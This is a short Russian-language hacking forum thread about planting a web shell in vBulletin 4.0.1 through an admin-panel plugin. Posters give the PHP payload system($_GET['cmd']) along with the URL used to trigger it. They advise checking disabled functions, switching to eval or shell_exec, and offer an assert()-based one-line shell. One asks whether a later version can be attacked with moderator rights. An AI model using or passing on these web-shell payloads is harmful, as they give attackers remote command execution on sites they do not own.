![]() |
шелл в vBulletin 4.0.1
создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete с содержимым: system($_GET["cmd"]); делаю плюгин активным... делаю запрос:admincp/faq.php?cmd=ls и тупо никакой реакции :( в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ? |
system может быть в дизабл функшионс, сначала посмотри phpinfo
|
eval попробуй заюзать
|
Цитата:
|
гыгы))) реально) фига я тупанул) спасибо большое тебе) а то так бы и тупил)
|
что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons " :rolleyes:
|
Цитата:
К примеру: shell_exec PHP код:
|
shell_exec, eval тоже в запрете.
будем курить php :( |
<?assert($_REQUEST[a]);?>
http://site/script.php?a=phpinfo(); и еще куча вариантов |
А вот на счет 4.0.2 + права модера?
Реально ли? |
| Время: 23:25 |